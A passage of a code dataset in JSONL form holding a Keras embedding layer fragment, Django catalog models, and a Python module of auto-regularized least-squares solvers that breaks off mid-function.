idx)\n\n\t\tsigmas = K.elu(sigmas) + 1.\n\n\t\tkds = kullback_leibler_divergence(\n\t\t\tmus=to_tangent_space_mu_zero,\n\t\t\tsigmas=sigmas)\n\n\t\tkds = K.squeeze(kds, axis=-1)\n\n\t\treturn kds\n\n\tdef compute_output_shape(self, input_shape):\n\t\treturn (input_shape[0], input_shape[1] - 1, )\n\n\tdef get_config(self):\n\t\tbase_config = 
super(HyperboloidGaussianEmbeddingLayer,\n\t\t\tself).get_config()\n\t\tbase_config.update({\"num_nodes\": self.num_nodes,\n\t\t\t\"embedding_dim\": self.embedding_dim})\n\t\treturn base_config","sub_path":"hednet/hyperboloid_layers.py","file_name":"hyperboloid_layers.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"348812108","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom utils.models import TimeStampedModel, SlugFromTitleModel\nfrom .managers import ProductManager\n\n\n\nclass Category(SlugFromTitleModel, MPTTModel):\n parent = TreeForeignKey(\n 'self', \n on_delete=models.CASCADE, \n blank=True, \n null=True, \n related_name='children',\n verbose_name=_('parent')\n )\n\n class Meta: \n verbose_name = _('category')\n verbose_name_plural = _('categories')\n \n class MPTTMeta:\n level_attr = 'mptt_level'\n order_insertion_by=['title']\n\n def __str__(self):\n return self.title\n\n\n\nclass Product(TimeStampedModel, SlugFromTitleModel):\n price = models.DecimalField(_('price'), max_digits=12, decimal_places=2)\n description = models.TextField(_('description'), blank=True, default='Description is not provided')\n active = models.BooleanField(_('active'), default=True)\n featured = models.BooleanField(_('featured'), default=False)\n category = models.ForeignKey(\n 'catalog.Category', \n on_delete=models.SET_NULL, \n null=True,\n related_name='products',\n verbose_name = _('related categories')\n )\n extra = models.JSONField(_('extra attributes as JSON'), null=True, blank=True)\n objects = ProductManager()\n\n def __str__(self):\n return self.title\n\n\n\ndef build_image_path(instance, filename):\n # file will be uploaded to MEDIA_ROOT/uploads/images//\n return 'uploads/images/{0}/{1}'.format(instance.product.title, filename)\n\n\n\nclass ProductImage(models.Model):\n src = models.ImageField(\n _('source'),\n upload_to=build_image_path, \n unique=True,\n help_text=_('Image file that will be available via URL after upload')\n )\n product = models.ForeignKey(\n 'catalog.Product', \n related_name='images', \n on_delete=models.CASCADE, \n verbose_name=_('product')\n )\n alt = models.CharField(\n _('image description'),\n max_length=255, \n null=True, \n blank=True,\n help_text=_('It\\'s used as plain text when image is not shown')\n )\n is_showcase = models.BooleanField(\n _('is showcase'), \n default=False, \n help_text=_('This image is for showcase purposes and should be unique per product')\n )\n\n class Meta:\n verbose_name=_('Product Image')\n verbose_name_plural=_('Product Images')\n\n def __str__(self):\n return f'{self.product.title} ({self.id})' \n \n\n\n\n","sub_path":"apps/catalog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161701493","text":"from math import sqrt\r\nimport numpy as np\r\nfrom numpy import atleast_1d, atleast_2d\r\nfrom scipy.linalg import qr, solve_triangular\r\nfrom scipy.linalg.decomp import _asarray_validated\r\nfrom scipy.linalg.misc import LinAlgError\r\n\r\n# Author : Rondall E. 
Jones, December 2020\r\n\r\n\r\ndef checkAb(A, b, maxcols):\r\n if len(A.shape) != 2:\r\n raise LinAlgError(\"Input array should be 2-D.\")\r\n m, n = A.shape\r\n if m == 0 or n == 0:\r\n raise LinAlgError(\"Matrix is empty.\")\r\n if b.shape[0] != m:\r\n raise LinAlgError(\r\n \"Matrix and RHS do not have the same number of rows.\")\r\n if maxcols < 2 and len(b.shape) > 1:\r\n raise LinAlgError(\r\n \"Right hand side must have only one column.\")\r\n return\r\n\r\n\r\ndef mynorm(x):\r\n return sqrt(np.dot(x, x))\r\n\r\n\r\ndef myrms(x):\r\n return sqrt(np.dot(x, x)) / sqrt(len(x))\r\n\r\n\r\ndef decide_width(mg):\r\n if mg < 3:\r\n return 1\r\n elif mg <= 8: # 4 spans\r\n return 2\r\n elif mg <= 20: # 5 spans\r\n return 4\r\n elif mg <= 36: # 6 spans\r\n return 6\r\n elif mg <= 64: # 8 spans\r\n return 8\r\n elif mg <= 100: # 10 spans\r\n return 10\r\n else:\r\n w = int(mg / 10)\r\n return 2 * int(w / 2) # 10 spans\r\n\r\n\r\ndef splita(g, mg):\r\n \"\"\" Determines a usable rank based on large rise in Picard Vector\"\"\"\r\n # initialize\r\n if mg < 2:\r\n return mg\r\n w = decide_width(mg)\r\n sensitivity = g[0]\r\n small = sensitivity\r\n local = sensitivity\r\n urank = 1\r\n for i in range(1, mg):\r\n sensitivity = g[i]\r\n if i >= w and sensitivity > 25.0 * small and sensitivity > local:\r\n break\r\n if sensitivity < small:\r\n small = small + 0.40 * (sensitivity - small)\r\n else:\r\n small = small + 0.10 * (sensitivity - small)\r\n local = local + 0.40 * (sensitivity - local)\r\n urank = i + 1\r\n return urank\r\n\r\n\r\ndef compute_mov_sums(g, mg, w): # REORDER ARGS LIKE GOlang\r\n numsums = mg - w + 1\r\n sums = np.zeros(numsums)\r\n for i in range(0, numsums):\r\n s = 0.0\r\n for j in range(i, i + w):\r\n s += g[j]\r\n sums[i] = s\r\n return sums\r\n\r\n\r\ndef splitb(g, mg):\r\n \"\"\" Determines a usable rank based on modest rise in Picard Vector\r\n after the low point in the PCV.\"\"\"\r\n w = decide_width(mg)\r\n if w < 2:\r\n return mg # splitb needs w>=2 to be reliable\r\n\r\n # magnify any divergence by squaring\r\n gg = np.zeros(mg)\r\n for i in range(0, mg):\r\n gg[i] = g[i] * g[i]\r\n\r\n # ignore dropouts\r\n for i in range(1, mg - 1):\r\n if gg[i] < 0.2 * gg[i - 1] and gg[i] < 0.2 * gg[i + 1]:\r\n gg[i] = 0.5 * min(gg[i - 1], gg[i + 1])\r\n\r\n # choose breakpoint as multiple of lowest moving average\r\n sums = compute_mov_sums(gg, mg, w)\r\n ilow = np.where(sums == min(sums))[0][0]\r\n bad = 20.0 * sums[ilow]\r\n\r\n # look for unexpected rise\r\n ibad = 0\r\n for i in range(ilow + 1, mg - w + 1):\r\n if sums[i] > bad:\r\n ibad = i\r\n break\r\n if ibad <= 0:\r\n urank = mg # leave urank alone\r\n else:\r\n urank = ibad + w - 1\r\n\r\n return urank\r\n\r\n\r\ndef rmslambdah(A, b, U, S, Vt, ur, lamb):\r\n \"\"\" Computes a regularized solution to Ax=b, given the usable rank\r\n and the Tikhonov lambda value.\"\"\"\r\n mn = S.shape[0]\r\n ps = np.zeros(mn)\r\n for i in range(0, ur):\r\n ps[i] = 1.0 / (S[i] + lamb ** 2 / S[i]) if S[i] > 0.0 else 0.0\r\n for i in range(ur, mn):\r\n ps[i] = 0.0\r\n # best to do multiplies from right end....\r\n xa = np.transpose(Vt) @ (np.diag(ps) @ (np.transpose(U) @ b))\r\n res = b - A @ xa\r\n r = myrms(res)\r\n return xa, r\r\n\r\n\r\ndef discrep(A, b, U, S, Vt, ur, mysigma):\r\n \"\"\" Computes Tikhonov's lambda using b's estimated RMS error, mysigma\"\"\"\r\n lo = 0.0 # for minimum achievable residual\r\n hi = 0.33 * float(S[0]) # for ridiculously large residual\r\n lamb = 0.0\r\n # bisect until we get the residual we want...but 
quit eventually\r\n    for k in range(0, 50):\r\n        lamb = (lo + hi) * 0.5\r\n        xa, check = rmslambdah(A, b, U, S, Vt, ur, lamb)\r\n        if abs(check - mysigma) < 0.0000001 * mysigma:\r\n            break  # close enough!\r\n        if check > mysigma:\r\n            hi = lamb\r\n        else:\r\n            lo = lamb\r\n    return lamb\r\n\r\n\r\ndef arlsusv(A, b, U, S, Vt):\r\n    \"\"\" core solver when SVD is already available \"\"\"\r\n    if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n        return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n    m, n = A.shape\r\n    mn = min(m, n)\r\n    # compute contributions to norm of solution\r\n    beta = np.transpose(U) @ b\r\n    k = 0\r\n    g = np.zeros(mn)\r\n    sense = 0.0\r\n    si = 0.0\r\n    cond = max(A.shape) * np.spacing(A.real.dtype.type(1))\r\n    eps = S[0] * cond\r\n    for i in range(0, mn):\r\n        si = S[i]\r\n        if si <= eps:\r\n            break\r\n        sense = beta[i] / si\r\n        if sense < 0.0:\r\n            sense = -sense\r\n        g[i] = sense\r\n        k = i + 1\r\n    nr = k  # traditional numeric rank\r\n    if k <= 0:\r\n        return np.zeros(n), 0, 0, 0.0, 0.0  # failsafe check\r\n\r\n    # two-stage search for divergence in Picard Condition Vector\r\n    ura = splita(g, k)\r\n    urb = splitb(g, ura)\r\n    ur = min(ura, urb)\r\n    if ur >= mn:\r\n        # problem is not ill-conditioned\r\n        x, check = rmslambdah(A, b, U, S, Vt, ur, 0.0)\r\n        sigma = 0.0\r\n        lambdah = 0.0\r\n    else:\r\n        # from ur, determine sigma\r\n        Utb = np.transpose(U) @ b\r\n        sigma = myrms(Utb[ur:mn])\r\n        # from sigma, determine lambda\r\n        lambdah = discrep(A, b, U, S, Vt, ur, sigma)\r\n        # from lambda, determine solution\r\n        x, check = rmslambdah(A, b, U, S, Vt, ur, lambdah)\r\n    return x, nr, ur, sigma, lambdah\r\n\r\n\r\ndef arls(A, b):\r\n    \"\"\"Solves the linear system of equations, Ax = b, for any shape matrix.\r\n\r\n    The system can be underdetermined, square, or over-determined.\r\n    That is, A(m,n) can be such that m < n, m = n, or m > n.\r\n    Argument b is a matrix of size(m,p) of p right-hand-side columns.\r\n    This solver automatically detects if each system is ill-conditioned or not.\r\n\r\n    Then\r\n    -- If the equations are consistent then the solution will usually be\r\n       exact within round-off error.\r\n    -- If the equations are inconsistent then the solution will be\r\n       by least-squares. 
That is, it solves ``min ||b - Ax||_2``.\r\n    -- If the equations are inconsistent and diagnosable as ill-conditioned\r\n       using the principles of the first reference below, the system will be\r\n       automatically regularized and the residual will be larger than minimum.\r\n    -- If either A or b is all zeros then the solution will be all zeros.\r\n\r\n    Parameters\r\n    ----------\r\n    A : (m, n) array_like\r\n        Coefficient matrix\r\n    b : (m, p) array_like\r\n        Set of columns of dependent variables.\r\n\r\n    Returns\r\n    -------\r\n    x : (n, p) array_like set of columns, type float.\r\n        Each column will be the solution corresponding to a column of b.\r\n    nr : int\r\n        The Numerical Rank of A.\r\n    mur : int\r\n        The Minimum Usable Rank seen in solving all the problems.\r\n        Note that \"numerical rank\" is an attribute of a matrix\r\n        but the \"usable rank\" that arls computes is an attribute\r\n        of the problem, Ax=b.\r\n    msigma : float\r\n        The largest estimated right-hand-side root-mean-square error seen.\r\n    mlambda : float\r\n        The largest estimated Tikhonov regularization parameter seen.\r\n\r\n    Raises\r\n    ------\r\n    LinAlgError\r\n        If A is not 2-D.\r\n        If A is empty.\r\n        If A and b do not have the same row size.\r\n        If b has more than one column.\r\n        If SCIPY's SVD() does not converge.\r\n\r\n    Examples\r\n    --------\r\n    Arls() will behave like any good least-squares solver when the system\r\n    is well conditioned.\r\n    Here is a tiny example of an ill-conditioned system as handled by arls(),\r\n\r\n       x + y = 2\r\n       x + 1.01 y = 3\r\n\r\n    Then A = array([[ 1., 1.],\r\n                    [ 1., 1.01]])\r\n    and b = array([2.0, 3.0])\r\n\r\n    Then standard solvers will return:\r\n    x = [-98. , 100.]\r\n\r\n    But arls() will see the violation of the Picard Condition and return\r\n    x = [1.12216 , 1.12779]\r\n\r\n    Notes:\r\n    -----\r\n    1. When the system is ill-conditioned, the process works best when the rows\r\n    of A are scaled so that the elements of b have similar estimated errors.\r\n    2. Arls() occasionally may produce a smoother (i.e., more regularized)\r\n    solution than desired. In this case please try scipy routine lsmr.\r\n    3. With any linear equation solver, check that the solution is reasonable.\r\n    In particular, you should check the residual vector, Ax - b.\r\n    4. Arls() neither needs nor accepts optional parameters such as iteration\r\n    limits, error estimates, variable bounds, condition number limits, etc.\r\n    It also does not return any error flags as there are no error states.\r\n    As long as the SVD converges (and SVD failure is remarkably rare)\r\n    then arls() and other routines in this package will complete normally.\r\n    5. Arls()'s intent (and the intent of all routines in this module)\r\n    is to find a reasonable solution even in the midst of excessive\r\n    inaccuracy, ill-conditioning, singularities, duplicated data, etc.\r\n    Its performance is often very like that of lsmr, but from a completely\r\n    different approach.\r\n    6. In view of note 5, arls() is not appropriate for situations\r\n    where the requirements are more for high accuracy rather than\r\n    robustness. So, we assume, in the coding, where needed, that no data\r\n    needs to be considered more accurate than 8 significant figures.\r\n\r\n    References\r\n    ----------\r\n    The auto-regularization algorithm in this software arose from the research\r\n    for my dissertation, \"Solving Linear Algebraic Systems Arising in the\r\n    Solution of Integral Equations of the First Kind\", University of\r\n    New Mexico, Albuquerque, NM, 1985.\r\n\r\n    Many thanks to Cleve B. 
Moler, MATLAB creator and co-founder of MathWorks\r\n    for his energy and insights in guiding my dissertation research.\r\n\r\n    My thanks also to Richard Hanson (deceased), co-author of the classic\r\n    \"Solving Least Squares Problems\", co-creator of BLAS, and co-advisor\r\n    for the last year of my dissertation work.\r\n\r\n    My thanks also to Per Christian Hansen for reviewing an early version\r\n    of this software which resulted in my creating the crucial two-phase\r\n    matrix \"split\" process.\r\n\r\n    And my thanks to the central computing department at Sandia National Labs\r\n    where I had the opportunity to contribute to the \"MATHLIB\" Fortran library\r\n    in the 1960's and 1970's. MATHLIB evolved into part of the\r\n    Fortran \"SLATEC\" library.\r\n    See http://www.netlib.org/slatec/src/\r\n\r\n    For a short presentation on the Picard Condition, which is at the heart\r\n    of this package's algorithms, see\r\n    www.rejones7.net/Arls/What_Is_The_Picard_Condition.htm\r\n\r\n    For a complete description, see \"The Discrete Picard Condition for Discrete\r\n    Ill-posed Problems\", Per Christian Hansen, 1990.\r\n    See link.springer.com/article/10.1007/BF01933214\r\n\r\n    For discussion of incorporating equality and inequality constraints\r\n    (including nonnegativity) in solving linear algebraic problems, see\r\n    \"Solving Least Squares Problems\", by Charles L. Lawson and\r\n    Richard J. Hanson, Prentice-Hall 1974.\r\n    My implementation of these features has evolved somewhat\r\n    from that fine book, but is based on those algorithms.\r\n\r\n    Rondall E. Jones, Ph.D.\r\n    rejones7@msn.com\r\n    \"\"\"\r\n    A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n    b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n    if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n        return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n    checkAb(A, b, 2)\r\n    m, n = A.shape\r\n    nrhs = 1\r\n    if len(b.shape) == 2:\r\n        nrhs = b.shape[1]\r\n\r\n    U, S, Vt = np.linalg.svd(A, full_matrices=False)\r\n\r\n    # one right hand side\r\n    if nrhs == 1:\r\n        return arlsusv(A, b, U, S, Vt)\r\n\r\n    # multiple right hand sides\r\n    xx = np.zeros((n, nrhs))\r\n    nr = min(A.shape)\r\n    mur = nr  # track minimum usable rank\r\n    msigma = 0.0  # track maximum estimated RHS error\r\n    mlamda = 0.0  # track maximum Tikhonov parameter\r\n    for p in range(0, nrhs):\r\n        xx[:, p], nr, ur, sigma, lambdah = arlsusv(A, b[:, p], U, S, Vt)\r\n        mur = min(mur, ur)\r\n        msigma = max(msigma, sigma)\r\n        mlamda = max(mlamda, lambdah)\r\n    return xx, nr, mur, msigma, mlamda\r\n\r\n\r\ndef strange(A, b):\r\n    \"\"\"determines whether the system A*x=b is likely ill-conditioned.\"\"\"\r\n    m, n = A.shape\r\n    epsilon = 10.0 * max(m, n) * np.spacing(b.real.dtype.type(1))\r\n    rn = np.zeros(m)\r\n    for k in range(0, m):\r\n        rn[k] = mynorm(A[k, :])\r\n    tol = max(rn) * epsilon\r\n    odd = False\r\n    for k in range(0, m):\r\n        if rn[k] < tol:\r\n            rn[k] = tol\r\n            odd = True\r\n    bb = abs(b)/rn\r\n    maxnorm = mynorm(bb) * 1.5\r\n    return odd, maxnorm\r\n\r\n\r\ndef arlsqr(A, b):\r\n    \"\"\"Solves the linear system of equations, Ax = b, for any shape matrix.\r\n\r\n    Arlsqr() is called exactly like arls() above, and the returns are\r\n    exactly the same.\r\n\r\n    The difference is that if b is only one column then arlsqr()\r\n    first performs a quick assessment of the system to see if it appears\r\n    to be ill-conditioned. If not, qr() is called for a solution.\r\n    If the resulting solution from qr() appears to be good, then it\r\n    is returned. Otherwise, arls() continues to get a solution\r\n    based on the SVD.\r\n\r\n    The purpose of this difference is to execute significantly faster than\r\n    arls() does if the problems given to it are usually well behaved.\r\n    \"\"\"\r\n
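    # Fast path (descriptive note): strange() screens the system, flagging rows\r\n    # with suspiciously tiny norms and bounding a plausible solution norm; if\r\n    # nothing looks odd a plain QR solve is tried first, and the SVD-based\r\n    # arls() is used only as the fallback when the triangular solve fails or\r\n    # the QR solution norm exceeds that bound.\r\n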
    A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n    b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n    nz = np.count_nonzero(A)\r\n    if nz == 0 or np.count_nonzero(b) == 0:\r\n        return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n    checkAb(A, b, 2)\r\n    m, n = A.shape\r\n    nr = min(m, n)\r\n    # is b a single column?\r\n    if len(b.shape) > 1:\r\n        return arls(A, b)\r\n    odd, maxnorm = strange(A, b)\r\n    if not odd or nz < int((m*n)/2):  # max norm test fails for sparse-like\r\n        if (m >= n):\r\n            Q, R = qr(A, mode='economic')\r\n            Qb = Q.T @ b\r\n            try:\r\n                x = solve_triangular(R, Qb)\r\n            except LinAlgError:\r\n                return arls(A, b)\r\n        else:\r\n            Q, R = qr(A.T, mode='economic')\r\n            try:\r\n                y = solve_triangular(R, b, 'T')\r\n            except LinAlgError:\r\n                return arls(A, b)\r\n            x = Q @ y\r\n        if mynorm(x) < maxnorm or nz < int((m*n)/2):\r\n            return x, nr, nr, 0.0, 0.0\r\n    return arls(A, b)\r\n\r\n\r\ndef find_max_row_norm(A):\r\n    \"\"\" determine max row norm of A \"\"\"\r\n    m = A.shape[0]\r\n    rnmax = 0.0\r\n    for i in range(0, m):\r\n        rn = mynorm(A[i, :])\r\n        if rn > rnmax:\r\n            rnmax = rn\r\n    return rnmax\r\n\r\n\r\ndef find_max_sense(E, f):\r\n    \"\"\" find the row of Ex=f which has the highest ratio of f[i]\r\n    to the norm of the row. \"\"\"\r\n    snmax = -1.0\r\n    ibest = 0  # default\r\n    m = E.shape[0]\r\n    for i in range(0, m):\r\n        rn = mynorm(E[i, :])\r\n        if rn > 0.0:\r\n            s = abs(f[i]) / rn\r\n            if s > snmax:\r\n                snmax = s\r\n                ibest = i\r\n    return ibest\r\n\r\n\r\ndef prepeq(E, f, neglect):\r\n    \"\"\" a utility routine for arlseq() below that prepares the equality\r\n    constraints for use\"\"\"\r\n    E = atleast_2d(_asarray_validated(E, check_finite=True))\r\n    f = atleast_1d(_asarray_validated(f, check_finite=True))\r\n    EE = E.copy()\r\n    ff = f.copy()\r\n    m, n = EE.shape\r\n    for i in range(0, m):\r\n        # determine new best row and put it next\r\n        if i == 0:\r\n            imax = find_max_sense(EE, ff)\r\n        else:\r\n            rnmax = -1.0\r\n            imax = -1\r\n            for k in range(i, m):\r\n                rn = mynorm(EE[k, :])\r\n                if rn > rnmax:\r\n                    rnmax = rn\r\n                    imax = k\r\n        EE[[i, imax], :] = EE[[imax, i], :]\r\n        ff[[i, imax]] = ff[[imax, i]]\r\n\r\n        # normalize\r\n        rin = mynorm(EE[i, :])\r\n        if rin > 0.0:\r\n            EE[i, :] /= rin\r\n            ff[i] /= rin\r\n        else:\r\n            ff[i] = 0.0\r\n\r\n        # subtract projections onto EE[i,:]\r\n        for k in range(i + 1, m):\r\n            d = np.dot(EE[k, :], EE[i, :])\r\n            EE[k, :] -= d * EE[i, :]\r\n            ff[k] -= d * ff[i]\r\n\r\n    # reject ill-conditioned rows\r\n    if m > 2:\r\n        g = np.zeros(m)\r\n        for k in range(0, m):\r\n            g[k] = abs(ff[k])\r\n        m1 = splita(g, m)\r\n        mm = splitb(g, m1)\r\n        if mm < m:\r\n            EE = np.resize(EE, (mm, n))\r\n            ff = np.resize(ff, mm)\r\n    return EE, ff\r\n\r\n\r\ndef arlseq(A, b, E, f):\r\n    \"\"\"Solves the double linear system of equations\r\n\r\n       Ax = b  (least squares)\r\n       Ex = f  (exact)\r\n\r\n    Both the Ax=b and Ex=f systems can be underdetermined, square,\r\n    or over-determined. Arguments b and f must be single columns.\r\n\r\n    Ex=f is treated as a set of equality constraints.\r\n    These constraints are usually few in number and well behaved.\r\n    But clearly the caller can easily provide equations in Ex=f that\r\n    are impossible to satisfy as a group. 
For example, there could be\r\n one equation requiring x[0]=0, and another requiring x[0]=1.\r\n And, the solver must deal with there being redundant or other\r\n pathological situations within the E matrix.\r\n So the solution process will either solve each equation in Ex=f exactly\r\n (within roundoff) or if that is impossible, arlseq() will discard\r\n one or more equations until the remaining equations are solvable\r\n exactly (within roundoff).\r\n We will refer below to the solution of this reduced system as \"xe\".\r\n\r\n After Ex=f is processed as above, the rows of Ax=b will have their\r\n projections onto every row of Ex=f subtracted from them.\r\n We will call this reduced set of equations A'x = b'.\r\n (Thus, the rows of A' will all be orthogonal to the rows of E.)\r\n This reduced problem A'x = b', will then be solved with arls().\r\n We will refer to the solution of this system as \"xt\".\r\n\r\n The final solution will be x = xe + xt.\r\n (Since E and A' are mutually orthogonal matrices.)\r\n\r\n If A'x = b' is NOT ill-conditioned (or singular) then x = xe + xt\r\n will satisfy all the equality constraints that were not rejected.\r\n However, if A'x = b' is ill-conditioned, then xt will be a regularized\r\n solution, not an exact solution, and thus x = xe + xt will not in general\r\n satisfy the equality constraints exactly.\r\n\r\n Parameters\r\n ----------\r\n A : (m, n) array_like \"Coefficient\" matrix, type float.\r\n b : (m) array_like column of dependent variables, type float.\r\n E : (me, n) array_like \"Coefficient\" matrix, type float.\r\n f : (me) array_like column of dependent variables, type float.\r\n\r\n Returns\r\n -------\r\n x : (n) array_like column, type float.\r\n nr : int\r\n The numerical rank of the matrix, A, after its projection onto the rows\r\n of E are subtracted.\r\n ur : int\r\n The \"usable\" rank of the \"reduced\" problem, Ax=b, after its projection\r\n onto the rows of Ex=f are subtracted.\r\n Note that \"numerical rank\" is an attribute of a matrix\r\n but the \"usable rank\" that arls computes is an attribute\r\n of the problem, Ax=b.\r\n sigma : float\r\n The estimated right-hand-side root-mean-square error.\r\n lambda : float\r\n The estimated Tikhonov regularization.\r\n\r\n Raises\r\n ------\r\n LinAlgError\r\n If A is not 2-D.\r\n If A is empty.\r\n If A and b do not have the same row size.\r\n If b has more than one column.\r\n If E is not 2-D.\r\n If E is empty.\r\n If E and f do not have the same row size.\r\n If f has more than one column.\r\n If A and E do not have the same number of columns.\r\n If SCIPY's SVD() does not converge.\r\n\r\n Examples\r\n --------\r\n Here is a tiny example of a problem which has an \"unknown\" amount\r\n of error in the right hand side, but for which the user knows that the\r\n correct SUM of the unknowns must be 3:\r\n\r\n x + 2 y = 5.3 (Least Squares)\r\n 2 x + 3 y = 7.8\r\n x + y = 3 ( Exact )\r\n\r\n Then the arrays for arlseq are:\r\n\r\n A = array([[ 1., 2.0],\r\n [ 2., 3.0]])\r\n b = array([5.3, 7.8])\r\n E = array([[ 1.0, 1.0]])\r\n f = array([3.0])\r\n\r\n Without using the equality constraint we are given here,\r\n standard solvers will return [x,y] = [-.3 , 2.8].\r\n Even arls() will return the same [x,y] = [-.3 , 2.8].\r\n The residual for this solution is [0.0 , 0.0] (within roundoff).\r\n But of course x + y = 2.5, not the 3.0 we really want.\r\n\r\n Arlsnn() could help here by disallowing presumably unacceptable\r\n negative values, producing [x,y] = [0. 
, 2.6].\r\n    The residual for this solution is [-0.1 , 0.] which is of course\r\n    an increase from zero, but this is natural since we have forced\r\n    the solution away from being the \"exact\" result, for good reason.\r\n    Note that x + y = 2.6, which is a little better.\r\n\r\n    If we solve with arlseq(A,b,E,f) then we get [x,y] = [1.004, 1.996].\r\n    This answer is close to the \"correct\" answer of [x,y] = [1.0 , 2.0]\r\n    if the right hand side had been the correct [5.,8.] instead of [5.3,7.8].\r\n    The residual for this solution is [-0.3 , 0.2] which is yet larger.\r\n    Again, when adding constraints to the problem the residual\r\n    typically increases, but the solution becomes more acceptable.\r\n    Note that x + y = 3 exactly.\r\n\r\n    Notes:\r\n    -----\r\n    See arls() above for notes and references.\r\n    \"\"\"\r\n    A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n    b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n    if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n        return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n    AA = A.copy()\r\n    bb = b.copy()\r\n    checkAb(AA, bb, 1)\r\n    m, n = AA.shape\r\n    rnmax = find_max_row_norm(AA)\r\n    neglect = rnmax * 0.00000001  # see Note 6. for arls()\r\n\r\n    E = atleast_2d(_asarray_validated(E, check_finite=True))\r\n    f = atleast_1d(_asarray_validated(f, check_finite=True))\r\n    EE = E.copy()\r\n    ff = f.copy()\r\n    checkAb(EE, ff, 1)\r\n    me, ne = EE.shape\r\n\r\n    if n != ne:\r\n        raise LinAlgError(\r\n            \"The two matrices do not have the same number of unknowns.\")\r\n\r\n    EE, ff = prepeq(EE, ff, neglect)\r\n    mEE = EE.shape[0]\r\n\r\n    # decouple AAx=bb from EEx=ff\r\n    i = 0\r\n    while i < m:\r\n        for j in range(0, mEE):\r\n            d = np.dot(AA[i, :], EE[j, :])\r\n            AA[i, :] -= d * EE[j, :]\r\n            bb[i] -= d * ff[j]\r\n        nm = mynorm(AA[i, :])\r\n        if nm < neglect:\r\n            AA = np.delete(AA, i, 0)\r\n            bb = np.delete(bb, i, 0)\r\n            m = AA.shape[0]\r\n        else:\r\n            AA[i, :] = AA[i, :] / nm\r\n            bb[i] = bb[i] / nm\r\n        i += 1\r\n\r\n    # final solution\r\n    xe = np.transpose(EE) @ ff\r\n    if AA.shape[0] > 0:\r\n        xt, nr, ur, sigma, lambdah = arls(AA, bb)\r\n        return xt + xe, nr, ur, sigma, lambdah\r\n    else:\r\n        return xe, 0, 0, 0., 0.\r\n\r\n\r\ndef arlsgt(A, b, G, h):\r\n    \"\"\"Solves the double linear system of equations\r\n       Ax = b   (least squares)\r\n       Gx >= h  (\"greater than\" inequality constraints)\r\n    Both Ax=b and Gx>=h can be underdetermined, square, or over-determined.\r\n    Arguments b and h must be single columns.\r\n    Arlsgt() uses arls(), above, as the core solver, and iteratively selects\r\n    rows of Gx>=h to move to a growing list of equality constraints, choosing\r\n    first whatever equation in Gx>=h most violates its requirement.\r\n\r\n    Note that \"less than\" equations can be included by negating\r\n    both sides of the equation, thus turning it into a \"greater than\".\r\n\r\n    If either A or b is all zeros then the solution will be all zeros.\r\n\r\n    Parameters\r\n    ----------\r\n    A : (m, n) array_like \"Coefficient\" matrix, type float.\r\n    b : (m) array_like column of dependent variables, type float.\r\n    G : (mg, n) array_like \"Coefficient\" matrix, type float.\r\n    h : (mg) array_like column of dependent variables, type float.\r\n\r\n    Returns\r\n    -------\r\n    x : (n) array_like column, type float.\r\n    nr : int\r\n        The numerical rank of the matrix, A.\r\n    ur : int\r\n        The usable rank of the problem, Ax=b.\r\n        Note that \"numerical rank\" is an attribute of a matrix\r\n        but the \"usable rank\" that arls computes is an attribute\r\n        of the problem, Ax=b.\r\n    sigma : 
float\r\n        The estimated right-hand-side root-mean-square error.\r\n    lambda : float\r\n        The estimated Tikhonov regularization.\r\n\r\n    Raises\r\n    ------\r\n    LinAlgError\r\n        If A is not 2-D.\r\n        If A is empty.\r\n        If A and b do not have the same row size.\r\n        If b has more than one column.\r\n        If G is not 2-D.\r\n        If G is empty.\r\n        If G and h do not have the same row size.\r\n        If h has more than one column.\r\n        If A and G do not have the same number of columns.\r\n        If SCIPY's SVD() does not converge.\r\n\r\n    Example\r\n    -------\r\n    Let A = [[1,1,1],\r\n             [0,1,1],\r\n             [1,0,1]]\r\n    and b = [5.9, 5.0, 3.9]\r\n\r\n    Then any least-squares solver would produce x = [0.9, 2., 3.]\r\n    The residual for this solution is zero within roundoff.\r\n\r\n    But if we happen to know that all the answers should be at least 1.0\r\n    then we can add inequalities to ensure that:\r\n        x[0] >= 1\r\n        x[1] >= 1\r\n        x[2] >= 1\r\n\r\n    This can be expressed in the matrix equation Gx>=h where\r\n    G = [[1,0,0],\r\n         [0,1,0],\r\n         [0,0,1]]\r\n    h = [1,1,1]\r\n\r\n    Then arlsgt(A,b,G,h) produces x = [1., 2.05, 2.9].\r\n    The residual vector and its norm are then:\r\n       res = [-0.05, 0.05, 0.0]\r\n       norm(res) = 0.0707\r\n\r\n    If the user had just adjusted the least-squares answer of [0.9, 2., 3.]\r\n    to [1., 2., 3.] without re-solving then the residual vector\r\n    and its norm would be\r\n       res = [0.1, 0, 0.1]\r\n       norm(res) = 0.141\r\n    which is significantly larger.\r\n    \"\"\"\r\n    A = atleast_2d(_asarray_validated(A, check_finite=True))\r\n    b = atleast_1d(_asarray_validated(b, check_finite=True))\r\n    if np.count_nonzero(A) == 0 or np.count_nonzero(b) == 0:\r\n        return np.zeros(A.shape[1]), 0, 0, 0.0, 0.0\r\n    checkAb(A, b, 1)\r\n    m, n = A.shape\r\n\r\n    G = atleast_2d(_asarray_validated(G, check_finite=True))\r\n    h = atleast_1d(_asarray_validated(h, check_finite=True))\r\n    GG = G.copy()\r\n    hh = h.copy()\r\n    checkAb(GG, hh, 1)\r\n    mg, ng = GG.shape\r\n    if n != ng:\r\n        raise LinAlgError(\r\n            \"The two matrices do not have the same number of unknowns.\")\r\n\r\n    EE = []\r\n    ff = []\r\n    